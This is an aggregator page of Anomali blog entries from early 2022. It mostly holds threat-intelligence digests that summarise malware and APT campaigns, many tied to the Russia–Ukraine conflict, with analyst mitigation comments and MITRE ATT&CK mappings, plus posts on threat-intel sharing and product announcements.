What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-04-12 19:06:00 | Anomali Cyber Watch: Zyxel Patches Critical Firewall Bypass Vulnerability, Spring4Shell (CVE-2022-22965), The Caddywiper Malware Attacking Ukraine and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Caddywiper, Colibri Loader, Gamaredon, SaintBear, SolarMaker and Spring4Shell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New SolarMaker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns
(published: April 8, 2022)
Palo Alto Researchers have released their technical analysis of a new version of SolarMaker malware. Prevalent since September 2020, SolarMaker’s initial infection vector is SEO poisoning; creating malicious websites with popular keywords to increase their ranking in search engines. Once clicked on, an encrypted Powershell script is automatically downloaded. When executed, the malware is installed. SolarMaker’s main functionality is the theft of web browser information such as stored passwords, auto-fill data, and saved credit card information. All the data is sent back to an encoded C2 server encrypted with AES. New features discovered by this technical analysis include increased dropper file size, droppers are always signed with legitimate certificates, a switch back to executables instead of MSI files. Furthermore, the backdoor is now loaded into the dropper process instead of the Powershell process upon first time execution.
Analyst Comment: Never click on suspicious links, always inspect the url for any anomalies. Untrusted executables should never be executed, nor privileges assigned to them. Monitor network traffic to assist in the discovery of non standard outbound connections which may indicate c2 activity.
MITRE ATT&CK: [MITRE ATT&CK] Data Obfuscation - T1001 | [MITRE ATT&CK] Encrypted Channel - T1573 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497
Tags: SolarMaker, Jupyter, Powershell, AES, C2, SEO poisoning
Google is on Guard: Sharks shall not Pass!
(published: April 7, 2022)
Check Point researchers have discovered a series of malicious apps on the Google Play store that infect users with the info stealer Sharkbot whilst masquerading as AV products. The primary functionality of Sharkbot is to steal user credentials and banking details which the user is asked to provide upon launching the app. Furthermore, Sharkbot asks the user to permit it a wide array of permissions that grant the malware a variety of functions such as reading and sending SMS messages and uninstalling other applications. Additionally, the malware is able to evade detection through various techniques. Sharkbot is geofenced, therefore it will stop functioning if it detects the user is from Belarus, China, India, Romania, Russia or Ukraine. Interestingly for Android malware, Sharkbot also utilizes domain generation algorithm (DGA). This allows the malware to dynamically generate C2 domains to help the malware function after a period of time even i |
Malware Tool Vulnerability Threat Patching | APT-C-23 | |
|
2022-04-05 18:17:00 | Anomali Cyber Watch: AcidRain Wiped Viasat Modems, BlackMatter Rewritten into BlackCat Ransomware, SaintBear Goes with Go, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Information stealers, Phishing, Russia, Ukraine, Vulnerabilities, and Wipers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
AcidRain | A Modem Wiper Rains Down on Europe
(published: March 31, 2022)
On February 24, 2022, Viasat KA-SAT modems became inoperable in Ukraine after threat actors exploited a misconfigured VPN appliance, compromised KA-SAT network, and were able to execute management commands on a large number of residential modems simultaneously. SentinelOne researchers discovered that a specific Linux wiper, dubbed AcidRain, likely used in that attack as it shows the same targeting and the same overwriting method that was seen in a Viasat’s Surfbeam2 modem targeted in the attack. AcidRain shows code similarities with VPNFilter stage 3 wiping plugin called dstr, but AcidRain’s code appears to be sloppier, so the connection between the two is still under investigation.
Analyst Comment: Internet service providers are heavily targeted due to their trust relationships with their customers and they should harden their configurations and access policies. Devices targeted by AcidRain can be brought back to service through flash memory/factory reset. Organizations exposed to Russia-Ukrainian military conflict should plan for backup options in case of a wiper attack.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | [MITRE ATT&CK] System Shutdown/Reboot - T1529 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Supply Chain Compromise - T1195
Tags: AcidRain, Viasat KA-SAT, Russia, Ukraine, Germany, target-country:UA, target-country:DE, Wiper, Modem, Supply-chain compromise, VPN appliance, VPNFilter
BlackCat Ransomware
(published: March 31, 2022)
BlackCat (ALPHV) ransomware-as-a-service surfaced on Russian-speaking underground forums in late 2021. The BlackCat ransomware is perhaps the first ransomware written entirely in Rust, and is capable of targeting both Windows and Linux machines. It targeted multiple industries in the US, Europe, the Philippines, and other regions, and Polyswarm researchers expect it to expand its operations. It is attributed to the BlackMatter/DarkSide ransomware threat group. BlackCat used some known BlackMatter infrastructure and shared the same techniques: reverse SSH tunnels and scheduled tasks for persistence, LSASS for credential access, lmpacket, RDP, and psexec for command and control.
Analyst Comment: It is crucial for your company to ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely. Additionally, always practice Defense in Depth (do not rely on single security mechanisms - security measures should be layered, redundant, and failsafe). Furthermore, a business continuity plan should be in place in the case of a |
Ransomware Malware Tool Vulnerability Threat Guideline | VPNFilter VPNFilter | |
|
2022-03-31 10:00:00 | The Need to Share (lien direct) | The Benefits of Sharing Threat Intelligence Inside and Outside Your Organization Welcome to this week’s blog. I hope you’re enjoying this series and what you’ve read so far if you’ve been following along. If you’re new, welcome as I dive deeper into the Top 10 Cybersecurity Challenges enterprise organizations face, as found in our recently released Cybersecurity Insights Report 2022: The State of Cyber Resilience. Coming in at number seven on our Top 10 List of the Challenges Cybersecurity Professionals Face is "Lack of ability to share threat intelligence cross-functionally." In an August blog, I wrote about President Biden’s Executive Order that sought to ensure that IT service providers share threat information about incidents with the federal government and collect and preserve data that could aid threat detection, investigation, and response. My comment was that before we share information as an industry, organizations need to break down their silos to share threat intelligence internally. It was not surprising to see this surface as one of the Top 10 Challenges organizations face. (I know, a clock is right twice a day, too, I’m taking the win here. Even if no one else is reading, I enjoy writing these.) Digital transformation has quickly expanded attack surfaces. Now more than ever, global organizations must balance a rapidly evolving cybersecurity threat landscape against business requirements. Threat information sharing is critical for security teams and organizations to protect themselves from cyber-attacks. The problem with sharing threat intelligence is that most organizations don’t know where to start. Enter Cyber Fusion Thirty years ago, military intelligence organizations developed the concept of cyber fusion, which combines HUMINT (human Intelligence) with COMINT (computer intelligence). They used the idea to collaborate with different intelligence communities and gain an in-depth understanding of the threat landscape. Cyber fusion is becoming increasingly popular in the cybersecurity industry, with organizations creating cyber fusion centers or using technologies like threat intelligence management or XDR (extended detection and response) solutions to eliminate silos, enhance threat visibility, and increase cyber resilience and collaboration between security teams. Cyber fusion offers a unified approach to cybersecurity by combining the intelligence from different teams into one cohesive picture. It also helps to integrate contextualized strategic, tactical, and operational threat intelligence for immediate threat prediction, detection, and analysis. How to Start Sharing Threat Intelligence Internally Cyber fusion takes a proactive approach to cybersecurity that helps organizations break down barriers and open communications across their entire organization to help them identify and address cyber risks before they become an issue. A cyber fusion approach helps foster collaboration among different departments within the company to focus on areas that ensure protection against relevant threats. By getting more people involved in keeping up with security issues and cyber incidents, organizations can ensure their investments and resources focus right where they need to be. Click on the image below to download our new ebook to learn more about how you can utilize cyber fusion to help break down silos within your organization. | Tool Threat Guideline | ||
|
2022-03-29 18:14:00 | Anomali Cyber Watch: North Korean APTs Used Chrome Zero-Day, Russian Energy Sector SCADA Targeting Unsealed, Lapsus$ Breached Microsoft - Finally Arrested, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data leak, Drive-by, ICS, Spearphishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Hive Ransomware Ports Its Linux VMware ESXi Encryptor to Rust
(published: March 27, 2022)
The Hive ransomware operators actively copy features first introduced in the BlackCat/ALPHV ransomware to make their ransomware samples more efficient and harder to reverse engineer. They have converted all their builds (targeting Windows, Linux, VMware ESXi) from Golang to the Rust programming language. They also moved from storing the victim's Tor negotiation page credentials in the encryptor executable to requiring the attacker to supply the user name and login password as a command-line argument when launching the malware.
Analyst Comment: Ransomware is an evolving threat, and the most fundamental defense is having proper backup processes in place. Follow the 1-2-3 rule: 3 copies, 2 devices, and 1 stored in a secure location. Data loss is manageable as long as regular backups are maintained.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Hive, Ransomware, BlackCat, VMware ESXi, Rust, Tor
US Says Kaspersky Poses Unacceptable Risk to National Security
(updated: March 25, 2022)
On March 25, 2022, the US Federal Communications Commission (FCC) added three new entities to its Covered List: China Mobile International USA Inc., China Telecom (Americas) Corp, and AO Kaspersky Labs. The action is aimed to secure US networks from threats posed by Chinese and Russian state-backed entities seeking to engage in espionage and otherwise harm America’s interests. Previously the FCC Covered List had five Chinese entities added in March 2021 including Huawei and ZTE. Kaspersky denied the allegations and stressed that the company “will continue to assure its partners and customers on the quality and integrity of its products, and remains ready to cooperate.” Earlier the same day, HackerOne blocked Kaspersky from its bug bounty program.
Analyst Comment: It seems that the FCC decision does not directly affect private parties using Kaspersky antivirus and other security products. There is no public data showing directly that Kaspersky is currently involved in cyberespionage or some malware distribution activity, but such suspicions were raised in previous years. Direct connections of Kaspersky to Russia and its own Federal Security Services (FSB) makes it both a potential security risk and a reputation risk as the military conflict in Ukraine leads to new sanctions and increased cyber activity.
Tags: Russia, USA, China, Ukraine, Kaspersky, FCC, FSB, Huawei, ZTE, China Mobile, China Telecom
|
Ransomware Malware Tool Vulnerability Threat Guideline | ★★★★★ | |
|
2022-03-22 16:58:00 | Anomali Cyber Watch: Russia Targets Ukraine with New Malware, Targeted Phishing Campaigns Give Way to Wizard Spider, Certificates Stolen by Lapsus$ Are Being Abused, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Code signing, Naver, Phishing, Russia, Ukraine, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Double Header: IsaacWiper and CaddyWiper
(published: March 18, 2022)
Data destruction is one of the common objectives for Russia in its ongoing cyberwar with Ukraine. During the February-March 2022 military escalation, three new wipers were discovered. On February 23, 2022, HermeticWiper, on February 24, 2022, IsaacWiper, and, later in March 2022, CaddyWiper. Malwarebytes researchers assess that all three wipers have been written by different authors and have no code overlap. IsaacWiper and CaddyWiper are light in comparison to the more complex HermeticWiper. CaddyWiper has an additional check to exclude wiping Domain Controllers probably to leave an opportunity for malware propagation.
Analyst Comment: Focus on intrusion prevention and having a proper disaster recovery plan in place: have anti-phishing training, keep your systems updated, regularly backup your data to an offline storage.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485
Tags: CaddyWiper, IsaacWiper, HermeticWiper, Wiper, Data destruction, Russia, Ukraine, Ukraine-Russia Conflict 2022, Operation Bleeding Bear
UAC-0035 (InvisiMole) Attacks Ukrainian Government Organizations
(published: March 18, 2022)
The Computer Emergency Response Team for Ukraine (CERT-UA) detected a new UAC-0035 (InvisiMole) phishing campaign targeting Ukrainian government organizations. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon (Primitive Bear) group. The new campaign features an attached archive, together with a shortcut (LNK) file. If the LNK file is opened, an HTML Application file (HTA) downloads and executes VBScript designed to deploy the LoadEdge backdoor. LoadEdge deploys additional malware and modules including TunnelMole, malware that abuses the DNS protocol to form a tunnel for malicious software distribution, and RC2CL backdoor module.
Analyst Comment: Users should be trained to recognize spearphishing attempts. Attachments with rare attachment extensions (LNK, ISO, BAT to name a few) should be reported.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Protocol Tunneling - T1572 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] User Execution - T1204
Tags: InvisiMole, UAC-0035, TunnelMole, Gamaredon, Primitive Bear, Russia, Ukraine, LNK, HTA, DNS, Ukraine-Russia Conflict 2022, Operation Bleeding Bear
Exposing Initial Access Broker with Ties to Co |
Ransomware Malware Tool Vulnerability Threat | ★★★★ | |
|
2022-03-17 11:00:00 | The Need to Use MITRE ATT&CK and Other Frameworks for Cyber Defense (lien direct) | Welcome to this week's blog, where I'll dive deeper into the Top 10 Cybersecurity Challenges enterprise organizations face, as found in our recently released Cybersecurity Insights Report 2022: The State of Cyber Resilience. Coming in at number eight on our “Top 10 List of the Challenges Cybersecurity Professionals Face” is the Underutilization of Frameworks to Support Investigations. What are Frameworks? Threat frameworks allow a security analyst to streamline investigations and make sense of the chaos of never-ending streams of alerts coming from security logs and intelligence feeds. They help tell a story about a threat actor or the phases of an attack using visualizations about a threat actor, how an attack can progress, what steps a given threat actor is going to take, and what mitigation steps are possible. Where did Frameworks Begin? In 2011, the US Department Of Defense recognized cyber warfare as a component of the 5th domain of warfare, information operations. Threat frameworks were derived from the term kill chain, a military concept that identifies the structure of an attack. It consists of identifying a target, dispatch, decision, order, and finally, destruction of the target. Lockheed Martin, a defense contractor, extended the military concept of a kill chain and adapted it to a cybersecurity threat model to help defend against cyber threats. Why Should Analysts Use Frameworks? Frameworks are a way to help organizations understand the context of a cyberattack and how worried they need to be and improve the security posture of their enterprise networks. As the latest vulnerability or breach makes its way around, threat frameworks can help organizations conduct a security assessment to outline their security vulnerabilities and quickly answer the question everyone wants to know: Are we affected? Another reason is to improve organizational efficiencies, enabling all teams to benefit immediately with success commensurate to the degree of integration in daily operations. Security teams are already stretched thin, making it difficult to defend against every threat. Frameworks are scalable from the smallest Security Operations Center (SOC) to a full enterprise with dedicated CTI, SOC, Threat Hunters, IR, Red Teams, and Blue Teams. And lastly, by visually characterizing the threat landscape in real-time, analysts can map threat actors to their footprint on the framework to reduce the scope of analysis to only what is relevant for their organizational architecture and vulnerabilities. Different Frameworks in Use Many different kinds of frameworks are used worldwide, each serving different purposes. Some of the frameworks were designed to help design, organize, deploy, and manage an entire IT and cybersecurity architecture. Others focus on one area or industry, such as banking and finance for PCI-DSS or healthcare for HIPAA. It's also not uncommon for one organization to use several different frameworks. Cybersecurity experts say that one of the most essential things for organizations to embrace in order to protect themselves from cyberattacks is to focus on adversarial behavior, including attacker tactics, techniques, and procedures (TTP). It's important to understand the mindset of an attacker to build and validate the best cyber defenses and eliminate potential threats. Frameworks enable analysts to understand and visualize attack patterns. This is one of the main reasons cybersecurity has been a major driver for framework adoption. Compliance needs and regulations have also brought mandatory cybersecurity frameworks, which are also key drivers for adoption. I won't go into deep detail here and just outline the more widely use | Vulnerability Threat | ||
|
2022-03-15 16:46:00 | Anomali Cyber Watch: Government and Financially-Motivated Targeting of Ukraine, Conti Ransomware Active Despite Exposure, Carbanak Abuses XLL Files, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Excel add-ins, Phishing, Russia, Ukraine, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Webinar on Cyberattacks in Ukraine – Summary and Q&A
(published: March 14, 2022)
As the military conflict in Ukraine continues, the number of cyberattacks in Ukraine is expected to rise in the next six months, according to Kaspersky researchers. Most of the current attacks on Ukraine are of low complexity, but advanced persistent threat (APT) attacks exist too. Gamaredon (Primitive Bear) APT group continues its spearphishing attacks. Sandworm APT targets SOHO network devices with modular Linux malware Cyclops Blink. Other suspected APT campaigns use MicroBackdoor malware or various wipers and fake ransomware (HermeticRansom, HermeticWiper, IsaacWiper, WhisperGate). Honeypot network in Ukraine detected over 20,000 attacking IP addresses, and most of them were seen attacking Ukraine exclusively.
Analyst Comment: Harden your infrastructure against DDoS attacks, ransomware and destructive malware, phishing, targeted attacks, supply-chain attacks, and firmware attacks. Install all the latest patches. Install security software. Consider strict application white-listing for all machines. Actively hunt for attackers inside the company’s internal network using the retrospective visibility provided by Anomali XDR.
MITRE ATT&CK: [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Pre-OS Boot - T1542 | [MITRE ATT&CK] Fallback Channels - T1008 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Disk Content Wipe - T1488 | [MITRE ATT&CK] Inhibit System Recovery - T1490
Tags: Gamaredon, Sandworm, MicroBackdoor, Hades, HermeticWiper, HermeticRansom, IsaacWiper, Pandora, Cyclops Blink, Government, Russia, Ukraine, UNC1151, Ghostwriter, Belarus, Ukraine-Russia Conflict 2022, Operation Bleeding Bear
Alert (AA21-265A) Conti Ransomware (Updated)
(published: March 9, 2022)
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), with assistance from the U.S. Secret Service has updated the alert on Conti ransomware with 98 domain names used in malicious operations. Conti ransomware-as-a-service (RaaS) operation is attributed to the threat group Wizard Spider also known for its Trickbot malware. The group’s internal data and communications were leaked at the end of February 2022 after they announced support for Russia over the conflict in Ukraine.
Analyst Comment: Despite the increased attention to Conti ransomware group, it remains extremely active. Ensure t |
Ransomware Malware Tool Vulnerability Threat | APT 28 | |
|
2022-03-08 18:54:00 | Anomali Cyber Watch: Daxin Hides by Hijacking TCP Connections, Belarus Targets Ukraine and Poland, Paying a Ransom is Not a Guarantee, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Belarus, China, Data breach, Data leak, Oil and gas, Phishing, Russia, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the attached IOCs and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Samsung Confirms Galaxy Source Code Breach but Says no Customer Information was Stolen
(published: March 7, 2022)
South American threat actor group Lapsus$ posted snapshots and claimed it had stolen 190GB of confidential data, including source code, from the South Korean tech company Samsung. On March 7, 2022, Samsung confirmed that the company recently suffered a cyberattack, but said that it doesn't anticipate any impact on its business or customers. Earlier, in February 2022, Lapsus$ had stolen 1TB data from GPU giant Nvidia and tried to negotiate with the company.
Analyst Comment: Companies should implement cybersecurity best practices to guard their source code and other proprietary data. Special attention should be paid to workers working from home and the security of contractors who have access to such data.
Tags: Lapsus$, South Korea, South America, Data breach
Beware of Malware Offering “Warm Greetings From Saudi Aramco”
(published: March 5, 2022)
Malwarebytes researchers discovered a new phishing campaign impersonating Saudi Aramco and targeting oil and gas companies. The attached pdf file contained an embedded Excel object which would download a remote template that exploits CVE-2017-11882 to download and execute the FormBook information stealer.
Analyst Comment: Organizations should train their users to recognize and report phishing emails. To mitigate this Formbook campaign, users should not handle emails coming from outside of the organization while being logged on with administrative user rights.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Template Injection - T1221
Tags: FormBook, CVE-2017-11882, Oil And Gas, Middle East, Saudi Aramco, Excel, Phishing, Remote template
Paying a Ransom Doesn’t Put an End to the Extortion
(published: March 2, 2022)
Venafi researchers conducted a survey regarding recent ransomware attacks and discovered that 83% of successful ransomware attacks include additional extortion methods, containing: threatening to extort customers (38%), stolen data exposure (35%), and informing customers that their data has been stolen (32%). 35% of those who paid the ransom were still unable to recover their data, 18% of victims had their data exposed despite the fact that they paid the ransom.
Analyst Comment: This survey shows that ransomware payments are not as reliable in preventing further damages to the victimized organization as previously thought. Educate employees on t |
Ransomware Malware Tool Threat | ||
|
2022-03-03 05:00:00 | Why are Organizations Suffering from a Lack of Threat Intelligence Information? (lien direct) | initIframe('621fae2743ebc30765551e5e'); Welcome to this week's blog, where I'll dive deeper into the Top 10 Cybersecurity Challenges enterprise organizations face, as found in our recently released Cybersecurity Insights Report 2022: The State of Cyber Resilience. Coming in at number nine on our “Top 10 List of the Challenges Cybersecurity Professionals Face” is the Lack of threat intelligence information. I gotta admit, when I first saw this on the list, I was scratching my head, as I'm sure any cybersecurity professional might be. But as I sat back and thought about it, it made more sense. There's no shortage of threat intelligence data out there, whether it's from open source or third-party feeds. In fact, I assumed most organizations were suffering from information overload as they're inundated with data. What they may lack is RELEVANT intelligence information specific to them. What do I mean? Well, we're all suffering from information overload. When I go to ESPN, I don't want to see all of the scores, I want to see the scores I care about. I want immediate access to my teams so I can be angry about them. (NY Giants and New Jersey Devils, I'm looking at you.) ESPN enables me to pick and choose my favorites so that I can make my experience relevant to me. Which is similar to what organizations need to do. When security teams log into their dashboard, they don't want to be hit with all the threats. They want to see the potential threats most relevant to them so they can take quick action. And they want threat intelligence to be operational so that it can be made actionable to inform security teams. So, what needs to be done? First, let's define Threat Intelligence. Threat Intelligence (TI) is the collection of raw data about threats and vulnerabilities that is then transformed into actionable intelligence. Effective threat intelligence programs help organizations detect and respond to cyberattacks before they cause harm. Organizations that fail to invest in TI as part of their security programs risk being blindsided by new threats or vulnerable to existing ones. Intelligence vs Information vs Data One of the reasons organizations might be struggling is that there might be some confusion between data, information, and intelligence, especially if they're managing threat intelligence manually. Let's start by trying to outline the differences. The main differences between data, information, and intelligence come in two forms: volume, and usability. Data is a collection of individual facts, statistics, or items of information, usually available in large quantities, it describes specific and indisputable facts. There is a subtle difference between data and information. Data are the facts or details from which information is derived. Individual pieces of data are rarely useful alone. For data to become information, data needs to be put into context. Information is created when a series of data is combined to answer a simple, straightforward question. Let's use hockey goalies as an example. An individual goalie’s save percentage is one piece of data. Let’s say you’ve used six goalies this year, each with varied save percentages. The average save percentage for the entire team can be derived from the given data. Note that although this output is more useful than the raw data, the GM still might not know exactly what to do with it. Intelligence takes this process one step further by interrogating data to t | Malware Threat | ||
|
2022-03-01 16:01:00 | Anomali Cyber Watch: Information-Stealing and Wiping Campaigns Target Ukraine, Electron Bot Is After Social Media Accounts, Attackers Poison Application and Library Repositories, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Iran, Russia, Spearphishing, Ukraine, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
(published: February 25, 2022)
Researchers at Unit 42 identified an attack targeting an energy organization in Ukraine. Ukrainian CERT has attributed this attack to a threat group they track as UAC-0056. The targeted attack involved a spear phishing email sent to organization employees containing a malicious JavaScript file that would download and install a downloader known as SaintBot and a document stealer called OutSteel. Actors leverage Discord’s content delivery network (CDN) to host their payload. Goal of this attack was data collection on government organizations and companies involved with critical infrastructure.
Analyst Comment: Administrators can block traffic to discordapp[.]com if their organization doesn’t have a current legitimate use of Discord. Implement attack surface reduction rules for Microsoft Office. Train users to recognize, safely process, and report potential spearphishing emails.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Modify Registry - T1112
Tags: Russia, Ukraine, OutSteal, SaintBot, UAC-0056, TA471, Lorec53, SaintBear, Ukraine-Russia Conflict 2022, Operation Bleeding Bear
Disruptive HermeticWiper Attacks Targeting Ukrainian Organizations
(published: February 25, 2022)
Researchers at Secureworks have identified and investigated reports of Ukrainian government and financial organizations being impacted by distributed denial of service and wiper attacks. Between 15-23 Feb intermittent loss of access to a large number of government websites belonging to the Ukrainian Ministry of Foreign Affairs, Ministry of Defense, Security Service, Ministry of Internal Affairs, and Cabinet of Ministers. PrivatBank and Oschadbank. Along with this, the threat actors also targeted some government and financial organizations in Ukraine to deploy a novel wiper dubbed ‘HermeticWiper’ which abuses a legitimate & signed EaseUS partition management driver. In other attacks targeting Ukraine researchers also observed 13 Ukrainian government websites defaced and Tor forums listing data for Ukrainian citizens being available for sale.
Analyst Comment: Organizations exposed to war between Russia and Ukraine should be on high alert regarding the ongoing cyberattacks. Implement defense-in-depth approach including patch management, anti-phishing training, disaster recovery plans, and backing up your information and systems.
MITRE ATT&CK: [MITRE ATT&CK] Data Destruction - T1485 | |
Ransomware Malware Tool Vulnerability Threat | ★★★★ | |
|
2022-03-01 12:00:00 | Anomali February Quarterly Product Release (lien direct) | Anomali has made its mark delivering Threat Intelligence powered detection and response with its ThreatStream, Match, and Lens portfolio. Now, we've expanded upon that leadership position by continuing to innovate and deliver the essential capabilities and XDR solutions our customers have been wanting. Key Highlights for this Quarter Include: Introducing Match in the Cloud Announcing The Anomali Platform Increased Insights with Intelligence Initiatives Extended Rules Engine Supporting Advanced Search Queries On-Prem 5.3 Release with Intelligence Initiatives and More Cybersecurity Insights Report and Blog Series Read more below to see what our incredible team has been working on this quarter. Introducing Match in the Cloud At the core of this new release is the hard work the team has done to introduce Match, Anomali’s big data threat detection engine, as a cloud-native deployment. By moving Match to the cloud, we’ve introduced new cloud capabilities that work together with existing ThreatStream and Lens capabilities in a cloud-native environment. With Match Cloud, we have unlocked our capability to ingest data from any telemetry source and access our global repository of threat intelligence to deliver high-performance indicator correlation at a rate of 190 trillion EPS. With Match Cloud, customers can add internal log sources and telemetry freely, leveraging the power of resource-intensive technologies that improve overall effectiveness and efficiencies. Match is available in both cloud and on-premise deployment options. Take our interactive tour to learn more. Announcing the Anomali Platform As I mentioned above, moving Match to the cloud created synergistic threat detection and response capabilities in a cloud-native environment across the entire Anomali portfolio. With that, we’re able to offer fully cloud-native multi-tenant solutions that easily integrate into existing security tech stacks. We’re excited to introduce The Anomali Platform, a cloud-native extended detection and response (XDR) solution. The Anomali Platform is made up of critical components that work together to ingest security data from any telemetry source and correlate it with our global repository of threat intelligence to drive detection, prioritization, analysis, and response. Included in the Anomali Platform are: Anomali Match Anomali ThreatStream Anomali Lens By combining big data management, machine learning, and the world’s largest global threat intelligence repository, organizations can understand what’s happening inside and outside their network within seconds. Read the Enterprise Management Associates (EMA) Impact Brief to see what they had to say about The Anomali Platform or take our interactive tour to learn more. And keep an eye out for our live event coming in Mid-April. Increased Insights with | Tool Threat Guideline | ||
|
2022-02-26 01:25:00 | Prevent Ransomware with New Capabilities from Anomali (lien direct) | In these uncertain times, ransomware attacks are only increasing, and Anomali is highly focused on helping CIOs and CISOs of enterprise businesses across the Globe along with our federal government and other government agencies. This is an infinite Journey against the bad guys, and we must all work together with all hands-on deck. Today, organizations employ defense in depth strategies to stop attacks. And while siloed security control points are effective at stopping most attacks before infection, the challenge is to stop ransomware attacks that typically evade protection. With The Anomali Platform, your XDR solution, you correlate globally identified ransomware attacks with your security telemetry (including public clouds), to discover the threats that are not detected by others. This enables you to proactively detect and respond, and ultimately reduce the risk of falling victim to ransomware attacks. Here is how we can help you and the ecosystem: Global Situational Awareness. Even before you are hit, a CISO must have the global situational awareness needed to understand the prevalence of these threats in the wild and the impact of these threat actors on your business, industry, and geography. The Anomali Platform attack trending dashboards provides security professionals the vital information you need to assess the threat of an impending attack. Stop The Initial Access. With a precision detection solution like The Anomali Platform, you can detect any malware. In the case of ransomware, this includes the ability to identify the first spear phishing access attempt by correlating messaging security telemetry together with all globally identified malicious links. Additionally, with an integrated sandbox capability, you can automate the inspection of suspicious emails through safe detonation and identification of attack indicators. Once identified, The Anomali Platform provides an analyst with the ability to review an attack and then respond by automatically updating security controls to block further infection. Stop the Attack. Precision detection provided by The Anomali Platform enables you to detect any ransomware in their environments on the first infected endpoint and to then automatically update endpoint security policies to block future threats. Because of our proprietary technology, you can correlate all endpoint telemetry including public clouds with the largest repository of global intelligence. The Anomali Platform has recently proven to catch Emotet attacks beyond what’s currently available in the ecosystem of security software. Stop the Communication. The Anomali Platform machine learning Domain Generation Algorithm (DGA) capability allows an analyst to quickly identify suspicious command and control connections associated with ransomware and all its variants. Additionally, C2 communication is easily detected by correlating all network traffic flow with global intelligence to return an accurate verdict. Using The Anomali Platform, an analyst can update perimeter and cloud security policies to block this communication. Stop the payload. At this point in the ransomware attack, an analyst will have enough correlated intelligence on the threat actor and the attack pattern to predict what is going to happen next. An analyst can use The Anomali Platform to predict the inevitable next stage of a multi-stage ransomware attack. Once again, the analyst can easily automate the response by disseminating high-fidelity indicators to security controls, protecting the organization from ransomware and all its variants. The Anomali Platform, our XDR solution, is a big data security offering that correlates all your organization’s telemetry (including public clouds) together with the largest repository of global threat intelligence, providing you with the power to detect and respond to ransomware at all stages of the attack. We are focused on dif | Ransomware Threat | ||
|
2022-02-25 00:05:00 | Anomali Threat Research Provides Russian Cyber Activity Dashboard (lien direct) | Russian government-sponsored threat actors recently increased their malicious activities[1], which are aligned with Russia’s attack on Ukraine in February 2022.
Russian retaliation for ongoing economic and diplomatic sanctions imposed by many other countries poses a significant risk of further escalation in the cyber sphere. Russian government-sponsored groups are dangerous cyber-actors that are well-resourced and relentless in their attacks, which include espionage, attacks on critical infrastructure, data destruction, and other malicious activities.
To assist our customers, Anomali has released a dashboard focused on Russian-origin actors and Russian cyber activity for ThreatStream users, titled “Russian Cyber Activity.”
The Anomali Threat Research team preconfigured this custom dashboard to provide immediate access and visibility into all known Russian government-related indicators of compromise (IOCs) made available through commercial and open-source threat feeds that users manage on Anomali ThreatStream.
